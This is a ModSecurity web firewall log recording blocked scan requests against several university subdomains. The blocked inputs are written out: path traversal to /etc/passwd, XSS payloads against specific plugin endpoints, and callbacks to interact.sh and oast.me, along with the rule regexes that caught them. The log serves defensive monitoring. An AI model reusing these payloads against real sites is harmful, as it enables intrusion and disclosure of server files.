[Tue Aug 29 11:55:06.551117 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KsCo-f0AAApXgloAAAAU"]
[Tue Aug 29 11:55:06.553188 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16KsCo-f0AAApbUbwAAAAh"]
[Tue Aug 29 11:55:06.636811 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16KsCo-f0AAAoz8B8AAAAS"]
[Tue Aug 29 11:55:06.644213 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KsCo-f0AAAqsV2UAAAAB"]
[Tue Aug 29 11:55:06.649081 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16KsCo-f0AAApXgl4AAAAU"]
[Tue Aug 29 11:55:06.664493 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KsCo-f0AAAqsV2YAAAAB"]
[Tue Aug 29 11:55:06.701041 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16KsCo-f0AAApXgmAAAAAU"]
[Tue Aug 29 11:55:06.705100 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16KsCo-f0AAAqhODwAAAAE"]
[Tue Aug 29 11:55:06.707565 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KsCo-f0AAAoz8CIAAAAS"]
[Tue Aug 29 11:55:07.651882 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16K8Co-f0AAAqsV2kAAAAB"]
[Tue Aug 29 11:55:07.717585 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16K8Co-f0AAAqTvoAAAAAa"]
[Tue Aug 29 11:55:07.831330 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16K8Co-f0AAAqSwoQAAAAN"]
[Tue Aug 29 11:55:08.545230 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LMCo-f0AAAqSwoUAAAAN"]
[Tue Aug 29 11:55:08.574585 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LMCo-f0AAAqRzJsAAAAM"]
[Tue Aug 29 11:55:08.577171 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LMCo-f0AAApa-MAAAAAg"]
[Tue Aug 29 11:55:08.577184 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LMCo-f0AAApbUcgAAAAh"]
[Tue Aug 29 11:55:08.592143 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16LMCo-f0AAAqSwoYAAAAN"]
[Tue Aug 29 11:55:08.603284 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LMCo-f0AAAqTvoMAAAAa"]
[Tue Aug 29 11:55:09.592829 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LcCo-f0AAAqsV3AAAAAB"]
[Tue Aug 29 11:55:11.675338 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16L8Co-f0AAAqSwo4AAAAN"]
[Tue Aug 29 11:55:11.879765 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16L8Co-f0AAApOdh8AAAAL"]
[Tue Aug 29 11:55:11.926515 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16L8Co-f0AAApbUdMAAAAh"]
[Tue Aug 29 11:55:11.927713 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16L8Co-f0AAAqsV30AAAAB"]
[Tue Aug 29 11:55:11.928855 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16L8Co-f0AAAqY6AQAAAAr"]
[Tue Aug 29 11:55:11.929131 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16L8Co-f0AAApOdiAAAAAL"]
[Tue Aug 29 11:55:12.532663 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16MMCo-f0AAAqsV34AAAAB"]
[Tue Aug 29 11:55:12.534591 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16MMCo-f0AAApbUdQAAAAh"]
[Tue Aug 29 11:55:12.538548 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16MMCo-f0AAApHReoAAAAP"]
[Tue Aug 29 11:55:12.538642 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16MMCo-f0AAAqeFR8AAAAx"]
[Tue Aug 29 11:55:12.588313 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16MMCo-f0AAApHResAAAAP"]
[Tue Aug 29 11:55:12.606347 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16MMCo-f0AAApbUdYAAAAh"]
[Tue Aug 29 11:55:12.611173 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16MMCo-f0AAAqSwpUAAAAN"]
